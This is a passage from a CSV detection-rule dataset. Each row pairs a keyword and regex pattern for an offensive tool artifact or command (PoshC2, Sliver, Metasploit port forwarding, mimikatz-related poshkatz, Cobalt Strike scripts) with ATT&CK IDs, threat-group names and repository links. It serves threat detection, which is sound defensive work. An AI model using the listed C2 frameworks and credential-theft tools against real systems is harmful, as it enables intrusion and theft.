- Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","N/A","10","10","712","111","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z","55034"
"*portfwd add ?l *-p *-r *",".{0,1000}portfwd\sadd\s\?l\s.{0,1000}\-p\s.{0,1000}\-r\s.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002  -  T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","N/A","1","0","N/A","Port forwarding","10","10","N/A","N/A","N/A","N/A","55035"
"*portfwd add --bind *",".{0,1000}portfwd\sadd\s\-\-bind\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","55036"
"*portfwd add -r *",".{0,1000}portfwd\sadd\s\-r\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","55037"
"*Ports can only be scanned in the active mode*",".{0,1000}Ports\scan\sonly\sbe\sscanned\sin\sthe\sactive\smode.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#linux #content","N/A","5","","N/A","","","","55056"
"*Port-Scan.ps1*",".{0,1000}Port\-Scan\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","55057"
"*portscan.rc*",".{0,1000}portscan\.rc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","55058"
"*portscan_result.cna*",".{0,1000}portscan_result\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","55059"
"*portscan386 *",".{0,1000}portscan386\s.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","55060"
"*portscan64 *",".{0,1000}portscan64\s.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","55061"
"*PortScan-Alive*",".{0,1000}PortScan\-Alive.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","55062"
"*portscanner.js*",".{0,1000}portscanner\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","55063"
"*portscanner.py*",".{0,1000}portscanner\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","55064"
"*Portscan-Port*",".{0,1000}Portscan\-Port.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","55065"
"*portScanWithService.py*",".{0,1000}portScanWithService\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","55066"
"*portScanWithService.py*",".{0,1000}portScanWithService\.py.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","55067"
"*portswigger.net*",".{0,1000}portswigger\.net.{0,1000}","offensive_tool_keyword","burpsuite","Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. This tool is not free and open source","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://portswigger.net/","1","1","N/A","network exploitation tool","N/A","N/A","N/A","N/A","N/A","N/A","55068"
"*portswigger.net*",".{0,1000}portswigger\.net.{0,1000}","offensive_tool_keyword","burpsuite","Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. This tool is not free and open source","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://portswigger.net/burp","1","0","N/A","network exploitation tool","N/A","N/A","N/A","N/A","N/A","N/A","55069"
"*PortSwigger/http-request-smuggler*",".{0,1000}PortSwigger\/http\-request\-smuggler.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","network exploitation tool","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","55070"
"*posh_in_mem*",".{0,1000}posh_in_mem.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","55071"
"*posh_stageless.py*",".{0,1000}posh_stageless\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","55072"
"*Posh_v4_dropper_*",".{0,1000}Posh_v4_dropper_.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","55073"
"*Posh_v4_x64_*.bin*",".{0,1000}Posh_v4_x64_.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","55074"
"*Posh_v4_x86_*.bin*",".{0,1000}Posh_v4_x86_.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","55075"
"*PoshADCS-master.zip*",".{0,1000}PoshADCS\-master\.zip.{0,1000}","offensive_tool_keyword","PoshADCS","attack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)","T1213.003 - T1213 - T1098.003 - T1098 - T1484.001","TA0002 - TA0003 - TA0040","N/A","N/A","Persistence","https://github.com/cfalta/PoshADCS","1","1","N/A","N/A","7","2","186","17","2021-07-07T16:47:07Z","2019-10-15T15:54:03Z","55076"
"*PoshC2-*.zip*",".{0,1000}PoshC2\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","55077"
"*poshc2.server*",".{0,1000}poshc2\.server.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","55078"
"*poshc2.service*",".{0,1000}poshc2\.service.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","55079"
"*poshc2-ansible-main.yml*",".{0,1000}poshc2\-ansible\-main\.yml.{0,1000}","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and Lateral Movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","55080"
"*posh-cookie-decryptor*",".{0,1000}posh\-cookie\-decryptor.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","55081"
"*posh-delete *",".{0,1000}posh\-delete\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","55082"
"*Poshito-C2 agent builder*",".{0,1000}Poshito\-C2\sagent\sbuilder.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","0","#content","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","55083"
"*poshkatz.psd1*",".{0,1000}poshkatz\.psd1.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/Stealthbits/poshkatz","1","1","N/A","N/A","10","3","212","33","2019-12-28T15:53:40Z","2018-10-29T16:07:40Z","55084"
"*posh-project *",".{0,1000}posh\-project\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","55085"
